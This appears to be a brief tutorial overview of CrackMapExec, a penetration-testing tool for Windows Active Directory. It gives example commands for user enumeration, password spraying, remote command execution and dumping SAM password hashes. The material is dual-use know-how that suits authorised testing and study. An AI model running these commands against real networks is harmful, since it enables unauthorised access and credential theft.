CrackMapExec Overview 🔍

CrackMapExec (CME) is an open-source tool used for network enumeration and penetration testing, particularly on Windows networks. It automates the process of gathering information, executing advanced password attacks, and performing post-exploitation activities like lateral movement. CME is often referred to as the “Swiss Army knife” for targeting Windows Active Directory environments. 🛠️

Key Features of CrackMapExec

  1. Active Directory Enumeration: Enumerate domains, forests, users, groups, computers, and trust relationships. 📋
  2. Credential Brute Forcing: Attack various network services (e.g., SMB, RPC, LDAP, and WinRM) with password spraying, credential stuffing, and brute force attacks. 🔑
  3. Remote Code Execution: Execute commands and scripts remotely on target systems using PowerShell, WMI, SMB, and PSExec. 💻
  4. Lateral Movement: Perform lateral movement and jump between compromised machines using techniques like pass-the-hash, pass-the-ticket, and token impersonation. 🔗
  5. Integration Support: Integrate with other penetration testing tools, such as Metasploit, PowerShell Empire, and BloodHound. 🔄

Example Code Snippets

Here are some example commands you can use with CrackMapExec:

Example 1: Enumerating Domain Users

# Enumerate all users in the domain
crackmapexec smb 192.168.1.0/24 -u 'username' -p 'password' --users

Example 2: Password Spraying

# Perform password spraying attack
crackmapexec smb 192.168.1.0/24 -u 'admin' -p 'password123'

Example 3: Remote Code Execution

# Execute a command on a remote system
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'P@ssw0rd' -x 'whoami'

Example 4: Dumping SAM Hashes

# Dump local SAM hashes from a target system
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'P@ssw0rd' --sam

Learning Resources 📚

For more detailed guides and resources, you can visit the CrackMapExec Cheat Sheet or the PopLabSec tutorial12.